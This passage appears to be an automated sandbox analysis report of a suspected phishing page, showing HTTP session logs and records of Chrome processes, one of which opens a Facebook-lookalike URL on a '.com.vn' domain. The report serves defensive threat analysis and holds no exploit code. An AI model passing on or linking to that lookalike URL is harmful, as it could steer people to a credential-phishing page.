          2024-05-27 22:33:21 UTC762INHTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:21 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          x-powered-by: PHP/7.4.33
          expires: Thu, 19 Nov 1981 08:52:00 GMT
          cache-control: no-store, no-cache, must-revalidate
          pragma: no-cache
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: BYPASS
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oo9p6bmwbDL6%2FyGLXLgN4Nwz35eloaYxpA60G9FKYu8U9yhG13a4SCocMSFUYOxNk95xCF1aEGhExL4GGOLuseftPJ1zhQDvkaG7d0MQMmqtzHdjbJxLkr5Vjeug3hiI%2BlbKxJZ6"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a977558c3819e7-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:21 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          7192.168.2.4497472.19.104.72443
          TimestampBytes transferredDirectionData
          2024-05-27 22:33:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Encoding: identity
          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
          Range: bytes=0-2147483646
          User-Agent: Microsoft BITS/7.8
          Host: fs.microsoft.com
          2024-05-27 22:33:22 UTC535INHTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
          ApiVersion: Distribute 1.1
          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
          Cache-Control: public, max-age=149783
          Date: Mon, 27 May 2024 22:33:22 GMT
          Content-Length: 55
          Connection: close
          X-CID: 2
          2024-05-27 22:33:22 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:18:33:08
          Start date:27/05/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          General

          Target ID:2
          Start time:18:33:12
          Start date:27/05/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1988,i,17365723044245015990,12212853972788622964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          General

          Target ID:3
          Start time:18:33:15
          Start date:27/05/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Disassembly

          No disassembly